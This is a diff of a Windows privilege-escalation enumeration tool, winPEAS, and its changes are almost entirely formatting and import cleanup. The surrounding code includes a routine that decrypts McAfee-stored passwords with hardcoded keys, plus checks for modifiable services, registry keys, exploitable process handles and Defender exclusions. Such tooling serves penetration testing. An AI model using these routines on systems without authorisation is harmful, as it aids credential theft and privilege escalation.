-using winPEAS.Info.EventsInfo.PowerShell;
 
 namespace winPEAS.Info.EventsInfo.ProcessCreation
 {
     internal class ProcessCreation
     {
         public static IEnumerable<ProcessCreationEventInfo> GetProcessCreationEventInfos()
-        {                     
+        {
             // Get our "sensitive" cmdline regexes from a common helper function.
-            var processCmdLineRegex = Common.GetInterestingProcessArgsRegex();            
+            var processCmdLineRegex = Common.GetInterestingProcessArgsRegex();
 
             var query = $"*[System/EventID=4688]";
             var logReader = MyUtils.GetEventLogReader("Security", query);
@@ -33,6 +32,6 @@ namespace winPEAS.Info.EventsInfo.ProcessCreation
                     }
                 }
             }
-        }    
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/EventsInfo/ProcessCreation/ProcessCreationEventInfo.cs

@@ -19,6 +19,6 @@ namespace winPEAS.Info.EventsInfo.ProcessCreation
             EventId = eventId;
             User = user;
             Match = match;
-        }       
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/FilesInfo/Certificates/CertificateInfo.cs

@@ -3,7 +3,7 @@ using System.Collections.Generic;
 
 namespace winPEAS.Info.FilesInfo.Certificates
 {
-    internal class CertificateInfo 
+    internal class CertificateInfo
     {
         public string StoreLocation { get; set; }
         public string Issuer { get; set; }

winPEAS/winPEASexe/winPEAS/Info/FilesInfo/Certificates/Certificates.cs

@@ -34,19 +34,19 @@ namespace winPEAS.Info.FilesInfo.Certificates
                         switch (ext.Oid.FriendlyName)
                         {
                             case "Enhanced Key Usage":
-                            {
-                                var extUsages = ((X509EnhancedKeyUsageExtension)ext).EnhancedKeyUsages;
-
-                                if (extUsages.Count == 0)
-                                    continue;
-
-                                foreach (var extUsage in extUsages)
                                 {
-                                    enhancedKeyUsages.Add(extUsage.FriendlyName);
+                                    var extUsages = ((X509EnhancedKeyUsageExtension)ext).EnhancedKeyUsages;
-                                }
 
-                                break;
+                                    if (extUsages.Count == 0)
-                            }
+                                        continue;
+
+                                    foreach (var extUsage in extUsages)
+                                    {
+                                        enhancedKeyUsages.Add(extUsage.FriendlyName);
+                                    }
+
+                                    break;
+                                }
                             case "Certificate Template Name":
                             case "Certificate Template Information":
                                 template = ext.Format(false);

winPEAS/winPEASexe/winPEAS/Info/FilesInfo/McAfee/McAfee.cs

@@ -127,7 +127,7 @@ namespace winPEAS.Info.FilesInfo.McAfee
             byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };
 
             // xor the input b64 string with the static XOR key
-            var passwordBytes = System.Convert.FromBase64String(base64password);
+            var passwordBytes = Convert.FromBase64String(base64password);
             for (var i = 0; i < passwordBytes.Length; i++)
             {
                 passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
@@ -137,7 +137,7 @@ namespace winPEAS.Info.FilesInfo.McAfee
 
             //var tDESKey = MyUtils.CombineArrays(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 });
             byte[] tDESKey = { 62, 241, 54, 184, 179, 59, 239, 188, 52, 38, 167, 181, 78, 196, 26, 55, 124, 211, 25, 155, 0, 0, 0, 0 };
-            
+
             // set the options we need
             var tDESalg = new TripleDESCryptoServiceProvider();
             tDESalg.Mode = CipherMode.ECB;

winPEAS/winPEASexe/winPEAS/Info/FilesInfo/Office/Office.cs

@@ -1,9 +1,9 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Globalization;
 using System.Linq;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 using winPEAS.Info.FilesInfo.Office.OneDrive;

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/Firewall.cs

@@ -1,6 +1,5 @@
 using System;
 using System.Collections.Generic;
-using System.Reflection;
 using System.Runtime.InteropServices;
 using winPEAS.Helpers;
 
@@ -25,7 +24,7 @@ namespace winPEAS.Info.NetworkInfo
                 Type firewall = Type.GetTypeFromCLSID(new Guid("E2B3C97F-6AE1-41AC-817A-F6F92166D7DD"));
                 object firewallObj = Activator.CreateInstance(firewall);
                 object types = ReflectionHelper.InvokeMemberProperty(firewallObj, "CurrentProfileTypes");
-                result = $"{(FirewallProfiles) int.Parse(types.ToString())}";
+                result = $"{(FirewallProfiles)int.Parse(types.ToString())}";
             }
             catch (Exception ex)
             {

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/InternetSettings/InternetSettings.cs

@@ -33,7 +33,7 @@ namespace winPEAS.Info.NetworkInfo.InternetSettings
             string zoneMapKey = @"Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapKey";
             AddSettings("HKCU", zoneMapKey, result.ZoneMaps, zoneMapKeys);
             AddSettings("HKLM", zoneMapKey, result.ZoneMaps, zoneMapKeys);
-            
+
             // List Zones settings with automatic logons
 
             /**
@@ -72,14 +72,14 @@ namespace winPEAS.Info.NetworkInfo.InternetSettings
                         authSetting.ToString(),
                         $"{zone} : {authSettingStr}"
                     ));
-                }                
+                }
             }
 
             return result;
         }
 
         private static void AddSettings(string hive, string keyPath, IList<InternetSettingsKey> internetSettingsList, IDictionary<string, string> zoneMapKeys = null)
-        {            
+        {
             var proxySettings = (RegistryHelper.GetRegValues(hive, keyPath) ?? new Dictionary<string, object>());
             if (proxySettings != null)
             {

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/InternetSettings/InternetSettingsKey.cs

@@ -19,7 +19,7 @@
             Value = value;
             Interpretation = interpretation;
             Hive = hive;
-            Path = path;            
+            Path = path;
         }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkInfoHelper.cs

@@ -17,8 +17,8 @@ namespace winPEAS.Info.NetworkInfo
     {
         // https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-socket
         private const int AF_INET = 2;
-        private const int AF_INET6 = 23;       
+        private const int AF_INET6 = 23;
-
+
         [StructLayout(LayoutKind.Sequential)]
         internal struct MIB_IPNETROW
         {
@@ -191,12 +191,12 @@ namespace winPEAS.Info.NetworkInfo
                 foreach (var listener in props.GetActiveTcpListeners())
                 {
                     bool repeated = false;
-                    foreach(List<string> inside_entry in results)
+                    foreach (List<string> inside_entry in results)
                     {
                         if (inside_entry.SequenceEqual(new List<string>() { "TCP", listener.ToString(), "", "Listening" }))
                             repeated = true;
                     }
-                    if (! repeated)
+                    if (!repeated)
                         results.Add(new List<string>() { "TCP", listener.ToString(), "", "Listening" });
                 }
 
@@ -218,12 +218,12 @@ namespace winPEAS.Info.NetworkInfo
             }
 
             return results;
-        }
+        }
-
+
-       
+
-
+
-        // https://stackoverflow.com/questions/3567063/get-a-list-of-all-unc-shared-folders-on-a-local-network-server
+        // https://stackoverflow.com/questions/3567063/get-a-list-of-all-unc-shared-folders-on-a-local-network-server
-        // v2: https://stackoverflow.com/questions/6227892/reading-share-permissions-in-c-sharp
+        // v2: https://stackoverflow.com/questions/6227892/reading-share-permissions-in-c-sharp
         public static List<Dictionary<string, string>> GetNetworkShares(string pcname)
         {
             List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
@@ -297,8 +297,8 @@ namespace winPEAS.Info.NetworkInfo
                 Beaprint.PrintException(ex.Message);
             }
             return results;
-        }       
+        }
-
+
         public static List<TcpConnectionInfo> GetTcpConnections(IPVersion ipVersion, Dictionary<int, Process> processesByPid = null)
         {
             int bufferSize = 0;
@@ -325,8 +325,8 @@ namespace winPEAS.Info.NetworkInfo
 
                 // If not zero, the call failed.
                 if (result != 0)
-                { 
+                {
-                    return new List<TcpConnectionInfo>(); 
+                    return new List<TcpConnectionInfo>();
                 }
 
                 // Marshals data fron an unmanaged block of memory to the
@@ -337,7 +337,7 @@ namespace winPEAS.Info.NetworkInfo
                 // Determine if IPv4 or IPv6.
                 if (ipVersion == IPVersion.IPv4)
                 {
-                    MIB_TCPTABLE_OWNER_PID tcpRecordsTable = (MIB_TCPTABLE_OWNER_PID) Marshal.PtrToStructure(tcpTableRecordsPtr, typeof(MIB_TCPTABLE_OWNER_PID));
+                    MIB_TCPTABLE_OWNER_PID tcpRecordsTable = (MIB_TCPTABLE_OWNER_PID)Marshal.PtrToStructure(tcpTableRecordsPtr, typeof(MIB_TCPTABLE_OWNER_PID));
 
                     IntPtr tableRowPtr = (IntPtr)((long)tcpTableRecordsPtr + Marshal.SizeOf(tcpRecordsTable.dwNumEntries));
 
@@ -373,7 +373,7 @@ namespace winPEAS.Info.NetworkInfo
                 }
                 else if (ipVersion == IPVersion.IPv6)
                 {
-                    MIB_TCP6TABLE_OWNER_PID tcpRecordsTable = (MIB_TCP6TABLE_OWNER_PID) Marshal.PtrToStructure(tcpTableRecordsPtr, typeof(MIB_TCP6TABLE_OWNER_PID));
+                    MIB_TCP6TABLE_OWNER_PID tcpRecordsTable = (MIB_TCP6TABLE_OWNER_PID)Marshal.PtrToStructure(tcpTableRecordsPtr, typeof(MIB_TCP6TABLE_OWNER_PID));
 
                     IntPtr tableRowPtr = (IntPtr)((long)tcpTableRecordsPtr + Marshal.SizeOf(tcpRecordsTable.dwNumEntries));
 
@@ -461,14 +461,14 @@ namespace winPEAS.Info.NetworkInfo
                 // Determine if IPv4 or IPv6.
                 if (ipVersion == IPVersion.IPv4)
                 {
-                    MIB_UDPTABLE_OWNER_PID udpRecordsTable = (MIB_UDPTABLE_OWNER_PID) Marshal.PtrToStructure(udpTableRecordsPtr, typeof(MIB_UDPTABLE_OWNER_PID));
+                    MIB_UDPTABLE_OWNER_PID udpRecordsTable = (MIB_UDPTABLE_OWNER_PID)Marshal.PtrToStructure(udpTableRecordsPtr, typeof(MIB_UDPTABLE_OWNER_PID));
                     IntPtr tableRowPtr = (IntPtr)((long)udpTableRecordsPtr + Marshal.SizeOf(udpRecordsTable.dwNumEntries));
 
                     // Read and parse the UDP records from the table and store them in list 
                     // 'UdpConnection' structure type objects.
                     for (int i = 0; i < udpRecordsTable.dwNumEntries; i++)
                     {
-                        MIB_UDPROW_OWNER_PID udpRow = (MIB_UDPROW_OWNER_PID) Marshal.PtrToStructure(tableRowPtr, typeof(MIB_UDPROW_OWNER_PID));
+                        MIB_UDPROW_OWNER_PID udpRow = (MIB_UDPROW_OWNER_PID)Marshal.PtrToStructure(tableRowPtr, typeof(MIB_UDPROW_OWNER_PID));
                         udpTableRecords.Add(new UdpConnectionInfo(
                                                 Protocol.UDP,
                                                 new IPAddress(udpRow.localAddr),

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/Structs/MIB_UDP6TABLE_OWNER_PID.cs

@@ -6,7 +6,7 @@ namespace winPEAS.Info.NetworkInfo.Structs
     public struct MIB_UDP6TABLE_OWNER_PID
     {
         public uint dwNumEntries;
-        [MarshalAs(UnmanagedType.ByValArray, ArraySubType = UnmanagedType.Struct,SizeConst = 1)]
+        [MarshalAs(UnmanagedType.ByValArray, ArraySubType = UnmanagedType.Struct, SizeConst = 1)]
         public MIB_UDP6ROW_OWNER_PID[] table;
     }
 }

winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/Structs/MIB_UDPTABLE_OWNER_PID.cs

@@ -6,7 +6,7 @@ namespace winPEAS.Info.NetworkInfo.Structs
     public struct MIB_UDPTABLE_OWNER_PID
     {
         public uint dwNumEntries;
-        [MarshalAs(UnmanagedType.ByValArray, ArraySubType = UnmanagedType.Struct,SizeConst = 1)]
+        [MarshalAs(UnmanagedType.ByValArray, ArraySubType = UnmanagedType.Struct, SizeConst = 1)]
         public MIB_UDPROW_OWNER_PID[] table;
     }
 }

winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/ProcessesInfo.cs

@@ -6,7 +6,6 @@ using System.Linq;
 using System.Management;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using System.Text;
 using System.Text.RegularExpressions;
 using System.Threading.Tasks;
 using winPEAS.Helpers;
@@ -33,7 +32,7 @@ namespace winPEAS.Info.ProcessInfo
                                     Proc = p,
                                     Pth = (string)mo["ExecutablePath"],
                                     CommLine = (string)mo["CommandLine"],
-                                    Owner = Helpers.HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
+                                    Owner = HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
                                 };
 
                     foreach (var itm in queRy)
@@ -54,14 +53,16 @@ namespace winPEAS.Info.ProcessInfo
                             }
                             if ((string.IsNullOrEmpty(companyName)) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
                             {
-                                Dictionary<string, string> to_add = new Dictionary<string, string>();
+                                Dictionary<string, string> to_add = new Dictionary<string, string>
-                                to_add["Name"] = itm.Proc.ProcessName;
+                                {
-                                to_add["ProcessID"] = itm.Proc.Id.ToString();
+                                    ["Name"] = itm.Proc.ProcessName,
-                                to_add["ExecutablePath"] = itm.Pth;
+                                    ["ProcessID"] = itm.Proc.Id.ToString(),
-                                to_add["Product"] = companyName;
+                                    ["ExecutablePath"] = itm.Pth,
-                                to_add["Owner"] = itm.Owner == null ? "" : itm.Owner;
+                                    ["Product"] = companyName,
-                                to_add["isDotNet"] = isDotNet;
+                                    ["Owner"] = itm.Owner == null ? "" : itm.Owner,
-                                to_add["CommandLine"] = itm.CommLine;
+                                    ["isDotNet"] = isDotNet,
+                                    ["CommandLine"] = itm.CommLine
+                                };
                                 f_results.Add(to_add);
                             }
                         }
@@ -123,11 +124,13 @@ namespace winPEAS.Info.ProcessInfo
 
                         string hName = HandlesHelper.GetObjectName(dupHandle);
 
-                        Dictionary<string, string> to_add = new Dictionary<string, string>();
+                        Dictionary<string, string> to_add = new Dictionary<string, string>
-                        to_add["Handle Name"] = hName;
+                        {
-                        to_add["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")";
+                            ["Handle Name"] = hName,
-                        to_add["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName;
+                            ["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")",
-                        to_add["Reason"] = handlerExp.reason;
+                            ["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName,
+                            ["Reason"] = handlerExp.reason
+                        };
 
                         if (typeName == "process" || typeName == "thread")
                         {
@@ -177,7 +180,7 @@ namespace winPEAS.Info.ProcessInfo
                             string sFilePath = fni.FileName;
                             if (sFilePath.Length == 0)
                                 continue;
-                            
+
                             List<string> permsFile = PermissionsHelper.GetPermissionsFile(sFilePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
                             try
                             {
@@ -208,13 +211,13 @@ namespace winPEAS.Info.ProcessInfo
                         else if (typeName == "key")
                         {
                             HandlesHelper.KEY_RELEVANT_INFO kri = HandlesHelper.getKeyHandlerInfo(dupHandle);
-                            if (kri.path.Length == 0 && kri.hive != null && kri.hive.Length> 0)
+                            if (kri.path.Length == 0 && kri.hive != null && kri.hive.Length > 0)
                                 continue;
 
                             RegistryKey regKey = Helpers.Registry.RegistryHelper.GetReg(kri.hive, kri.path);
                             if (regKey == null)
                                 continue;
-                            
+
                             List<string> permsReg = PermissionsHelper.GetMyPermissionsR(regKey, Checks.Checks.CurrentUserSiDs);
 
                             // If current user already have permissions over that reg, handle not interesting to elevate privs

winPEAS/winPEASexe/winPEAS/Info/ServicesInfo/ServicesInfoHelper.cs

@@ -1,4 +1,5 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Diagnostics;
 using System.Linq;
@@ -8,10 +9,8 @@ using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using System.ServiceProcess;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
-using winPEAS.KnownFileCreds;
 using winPEAS.Native;
 
 namespace winPEAS.Info.ServicesInfo
@@ -51,17 +50,18 @@ namespace winPEAS.Info.ServicesInfo
 
                                 if (string.IsNullOrEmpty(companyName) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
                                 {
-                                    Dictionary<string, string> toadd = new Dictionary<string, string>();
+                                    Dictionary<string, string> toadd = new Dictionary<string, string>
-
+                                    {
-                                    toadd["Name"] = GetStringOrEmpty(result["Name"]);
+                                        ["Name"] = GetStringOrEmpty(result["Name"]),
-                                    toadd["DisplayName"] = GetStringOrEmpty(result["DisplayName"]);
+                                        ["DisplayName"] = GetStringOrEmpty(result["DisplayName"]),
-                                    toadd["CompanyName"] = companyName;
+                                        ["CompanyName"] = companyName,
-                                    toadd["State"] = GetStringOrEmpty(result["State"]);
+                                        ["State"] = GetStringOrEmpty(result["State"]),
-                                    toadd["StartMode"] = GetStringOrEmpty(result["StartMode"]);
+                                        ["StartMode"] = GetStringOrEmpty(result["StartMode"]),
-                                    toadd["PathName"] = GetStringOrEmpty(result["PathName"]);
+                                        ["PathName"] = GetStringOrEmpty(result["PathName"]),
-                                    toadd["FilteredPath"] = binaryPath;
+                                        ["FilteredPath"] = binaryPath,
-                                    toadd["isDotNet"] = isDotNet;
+                                        ["isDotNet"] = isDotNet,
-                                    toadd["Description"] = GetStringOrEmpty(result["Description"]);
+                                        ["Description"] = GetStringOrEmpty(result["Description"])
+                                    };
 
                                     results.Add(toadd);
                                 }
@@ -166,7 +166,7 @@ namespace winPEAS.Info.ServicesInfo
             }
             return results;
         }
-       
+
         public static Dictionary<string, string> GetModifiableServices(Dictionary<string, string> SIDs)
         {
             Dictionary<string, string> results = new Dictionary<string, string>();
@@ -222,7 +222,7 @@ namespace winPEAS.Info.ServicesInfo
                             { //https://docs.microsoft.com/en-us/dotnet/api/system.security.accesscontrol.commonace?view=net-6.0
                                 int serviceRights = ace.AccessMask;
                                 string current_perm_str = PermissionsHelper.PermInt2Str(serviceRights, PermissionType.WRITEABLE_OR_EQUIVALENT_SVC);
-                                
+
                                 if (!string.IsNullOrEmpty(current_perm_str) && !permissions.Contains(current_perm_str))
                                     permissions.Add(current_perm_str);
                             }
@@ -232,7 +232,7 @@ namespace winPEAS.Info.ServicesInfo
                     if (permissions.Count > 0)
                     {
                         string perms = String.Join(", ", permissions);
-                        if (perms.Replace("Start", "").Replace("Stop","").Length > 3) //Check if any other permissions appart from Start and Stop
+                        if (perms.Replace("Start", "").Replace("Stop", "").Length > 3) //Check if any other permissions appart from Start and Stop
                             results.Add(sc.ServiceName, perms);
                     }
 
@@ -249,9 +249,9 @@ namespace winPEAS.Info.ServicesInfo
         ///////  Find Write reg. Services ////////
         //////////////////////////////////////////
         /// Find Services which Reg you have write or equivalent access
-        public static List<Dictionary<string, string>> GetWriteServiceRegs(Dictionary<string,string> NtAccountNames)
+        public static List<Dictionary<string, string>> GetWriteServiceRegs(Dictionary<string, string> NtAccountNames)
         {
-            List<Dictionary<string,string>> results = new List<Dictionary<string, string>>();
+            List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
             try
             {
                 RegistryKey regKey = Registry.LocalMachine.OpenSubKey(@"system\currentcontrolset\services");
@@ -275,7 +275,7 @@ namespace winPEAS.Info.ServicesInfo
             return results;
         }
 
-        
+
         //////////////////////////////////////
         ////////  PATH DLL Hijacking /////////
         //////////////////////////////////////
@@ -294,7 +294,7 @@ namespace winPEAS.Info.ServicesInfo
 
                 foreach (string folder in folders)
                     results[folder] = String.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs));
-                
+
             }
             catch (Exception ex)
             {

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/CredentialGuard.cs

@@ -35,7 +35,7 @@ namespace winPEAS.Info.SystemInfo
                         {
                             var configCheck = (int[])result.GetPropertyValue("SecurityServicesConfigured");
                             var serviceCheck = (int[])result.GetPropertyValue("SecurityServicesRunning");
-                            
+
                             var configured = false;
                             var running = false;
 
@@ -56,7 +56,7 @@ namespace winPEAS.Info.SystemInfo
                                                $"    Configured:                                {configured}\n" +
                                                $"    Running:                                   {running}",
                                                   colors);
-                            
+
                         }
                     }
                 }
@@ -68,7 +68,7 @@ namespace winPEAS.Info.SystemInfo
             catch (Exception ex)
             {
                 //Beaprint.PrintException(ex.Message);
-            }        
+            }
         }
 
         private static string GetVbsSettingString(uint? vbs)

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/DotNet/DotNet.cs

@@ -38,7 +38,7 @@ namespace winPEAS.Info.SystemInfo.DotNet
 
         private static string GetOSVersion()
         {
-            
+
             try
             {
                 using (var wmiData = new ManagementObjectSearcher(@"root\cimv2", "SELECT Version FROM Win32_OperatingSystem"))

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/GroupPolicy/GroupPolicy.cs

@@ -1,5 +1,5 @@
-using System.Collections.Generic;
+using Microsoft.Win32;
-using Microsoft.Win32;
+using System.Collections.Generic;
 using winPEAS.Helpers.Registry;
 using winPEAS.Native.Enums;
 
@@ -14,7 +14,7 @@ namespace winPEAS.Info.SystemInfo.GroupPolicy
             // local machine GPOs
             var basePath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\DataStore\Machine\0";
             var machineIDs = RegistryHelper.GetRegSubkeys("HKLM", basePath) ?? new string[] { };
-            
+
             foreach (var id in machineIDs)
             {
                 var settings = RegistryHelper.GetRegValues("HKLM", $"{basePath}\\{id}");

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/NamedPipes/NamedPipes.cs

@@ -3,7 +3,6 @@ using System.IO;
 using System.Runtime.InteropServices;
 using System.Security.AccessControl;
 using winPEAS.Native;
-using System.Security.Principal;
 
 
 namespace winPEAS.Info.SystemInfo.NamedPipes
@@ -51,7 +50,7 @@ namespace winPEAS.Info.SystemInfo.NamedPipes
                 {
                     var security = File.GetAccessControl($"\\\\.\\pipe\\{namedPipe}");
                     sddl = security.GetSecurityDescriptorSddlForm(AccessControlSections.All);
-                    List<string> currentUserPermsList = winPEAS.Helpers.PermissionsHelper.GetMyPermissionsF(security, winPEAS.Checks.Checks.CurrentUserSiDs);
+                    List<string> currentUserPermsList = Helpers.PermissionsHelper.GetMyPermissionsF(security, Checks.Checks.CurrentUserSiDs);
                     currentUserPerms = string.Join(", ", currentUserPermsList);
                 }
                 catch

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/Ntlm/NtlmSettingsInfo.cs

@@ -5,7 +5,7 @@
         public uint? LanmanCompatibilityLevel { get; set; }
 
         public string LanmanCompatibilityLevelString
-        { 
+        {
             get
             {
                 switch (LanmanCompatibilityLevel)
@@ -25,11 +25,11 @@
         public bool ClientRequireSigning { get; set; }
         public bool ClientNegotiateSigning { get; set; }
         public bool ServerRequireSigning { get; set; }
-        public bool ServerNegotiateSigning { get; set; }        
+        public bool ServerNegotiateSigning { get; set; }
         public uint? LdapSigning { get; set; }
 
         public string LdapSigningString
-        { 
+        {
             get
             {
                 switch (LdapSigning)
@@ -44,7 +44,7 @@
         }
 
         public uint? NTLMMinClientSec { get; set; }
-        public uint? NTLMMinServerSec { get; set; }        
+        public uint? NTLMMinServerSec { get; set; }
         public uint? InboundRestrictions { get; internal set; }
 
         public string InboundRestrictionsString

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/PowerShell/PowerShell.cs

@@ -8,7 +8,7 @@ namespace winPEAS.Info.SystemInfo.PowerShell
     internal class PowerShell
     {
         public static IEnumerable<PowerShellSessionSettingsInfo> GetPowerShellSessionSettingsInfos()
-        {           
+        {
             var plugins = new[] { "Microsoft.PowerShell", "Microsoft.PowerShell.Workflow", "Microsoft.PowerShell32" };
 
             foreach (var plugin in plugins)
@@ -49,6 +49,6 @@ namespace winPEAS.Info.SystemInfo.PowerShell
 
                 yield return new PowerShellSessionSettingsInfo(plugin, access);
             }
-        }    
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/PowerShell/PowerShellSessionSettingsInfo.cs

@@ -11,6 +11,6 @@ namespace winPEAS.Info.SystemInfo.PowerShell
         {
             Plugin = plugin;
             Permissions = permissions;
-        }        
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/Printers/Printers.cs

@@ -10,14 +10,14 @@ using winPEAS.Native.Enums;
 namespace winPEAS.Info.SystemInfo.Printers
 {
     internal class Printers
-    {       
+    {
         [StructLayout(LayoutKind.Sequential)]
         public struct SECURITY_INFOS
         {
             public string Owner;
             public RawSecurityDescriptor SecurityDescriptor;
             public string SDDL;
-        }       
+        }
 
         public static IEnumerable<PrinterInfo> GetPrinterWMIInfos()
         {

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SysMon/SysMon.cs

@@ -2,7 +2,6 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics.Eventing.Reader;
-using System.Text.RegularExpressions;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -14,7 +13,7 @@ namespace winPEAS.Info.SystemInfo.SysMon
 
         public static IEnumerable<SysmonInfo> GetSysMonInfos()
         {
-            var paramsKey = @"SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters";          
+            var paramsKey = @"SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters";
             uint? regHashAlg = GetUintNullableFromString(RegistryHelper.GetRegValue("HKLM", paramsKey, "HashingAlgorithm"));
             uint? regOptions = GetUintNullableFromString(RegistryHelper.GetRegValue("HKLM", paramsKey, "Options"));
             byte[] regSysmonRules = GetBinaryValueFromRegistry(Registry.LocalMachine, paramsKey, "Rules");

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SysMon/SysmonInfo.cs

@@ -13,6 +13,6 @@
             HashingAlgorithm = hashingAlgorithm;
             Options = options;
             Rules = rules;
-        } 
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs

@@ -9,7 +9,6 @@ using System.Net.NetworkInformation;
 using System.Windows.Forms;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
-using winPEAS.KnownFileCreds;
 
 namespace winPEAS.Info.SystemInfo
 {
@@ -160,7 +159,7 @@ namespace winPEAS.Info.SystemInfo
         {
             Dictionary<string, string> results = new Dictionary<string, string>();
             string whitelistpaths = "";
-            
+
             try
             {
                 var keys = RegistryHelper.GetRegValues("HKLM", @"SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths");
@@ -188,7 +187,7 @@ namespace winPEAS.Info.SystemInfo
             {
                 results["whitelistpaths"] = "    " + whitelistpaths; //Add this info the last
             }
-            
+
             return results;
         }
 
@@ -342,7 +341,7 @@ namespace winPEAS.Info.SystemInfo
         {
             var keys = RegistryHelper.GetRegSubkeys("HKLM", @"SOFTWARE\Microsoft\PowerShellCore\InstalledVersions\") ?? new string[] { };
 
-            return keys.Select(key => 
+            return keys.Select(key =>
                 RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\PowerShellCore\InstalledVersions\" + key, "SemanticVersion"))
                               .Where(version => version != null).ToList();
         }
@@ -461,7 +460,7 @@ namespace winPEAS.Info.SystemInfo
                 if ((settings != null) && (settings.Count != 0))
                 {
                     foreach (KeyValuePair<string, object> kvp in settings)
-                    { 
+                    {
                         result[kvp.Key] = (string)kvp.Value;
                     }
                 }

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettings.cs

@@ -1,7 +1,5 @@
 using System;
 using System.Collections.Generic;
-using Microsoft.Win32;
-using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
 namespace winPEAS.Info.SystemInfo.WindowsDefender
@@ -17,14 +15,14 @@ namespace winPEAS.Info.SystemInfo.WindowsDefender
         public WindowsDefenderSettings(string defenderBaseKeyPath)
         {
             PathExclusions = new List<string>();
-            var pathExclusionData = RegistryHelper.GetRegValues("HKLM", $"{ defenderBaseKeyPath}\\Exclusions\\Paths");            
+            var pathExclusionData = RegistryHelper.GetRegValues("HKLM", $"{defenderBaseKeyPath}\\Exclusions\\Paths");
             if (pathExclusionData != null)
             {
                 foreach (var kvp in pathExclusionData)
                 {
                     PathExclusions.Add(kvp.Key);
                 }
-            }            
+            }
 
             PolicyManagerPathExclusions = new List<string>();
             var excludedPaths = RegistryHelper.GetRegValue("HKLM", $"{defenderBaseKeyPath}\\Policy Manager", "ExcludedPaths");
@@ -54,7 +52,7 @@ namespace winPEAS.Info.SystemInfo.WindowsDefender
                 {
                     ExtensionExclusions.Add(kvp.Key);
                 }
-            }            
+            }
 
             var asrKeyPath = $"{defenderBaseKeyPath}\\Windows Defender Exploit Guard\\ASR";
             var asrEnabled = RegistryHelper.GetRegValue("HKLM", asrKeyPath, "ExploitGuard_ASR_Rules");
@@ -82,7 +80,7 @@ namespace winPEAS.Info.SystemInfo.WindowsDefender
                 {
                     AsrSettings.Exclusions.Add(value.Key);
                 }
-            }            
+            }
         }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/SystemInfo/WindowsDefender/WindowsDefenderSettingsInfo.cs

@@ -1,10 +1,4 @@
-using System;
+namespace winPEAS.Info.SystemInfo.WindowsDefender
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-
-namespace winPEAS.Info.SystemInfo.WindowsDefender
 {
     class WindowsDefenderSettingsInfo
     {

winPEAS/winPEASexe/winPEAS/Info/UserInfo/LogonSessions/LogonSessions.cs

@@ -184,5 +184,5 @@ namespace winPEAS.Info.UserInfo.LogonSessions
                 }
             }
         }
-    } 
+    }
 }

winPEAS/winPEASexe/winPEAS/Info/UserInfo/LogonSessions/LogonSessionsInfo.cs

@@ -43,6 +43,6 @@ namespace winPEAS.Info.UserInfo.LogonSessions
             LogonServerDnsDomain = logonServerDnsDomain;
             UserPrincipalName = userPrincipalName;
             UserSID = userSid;
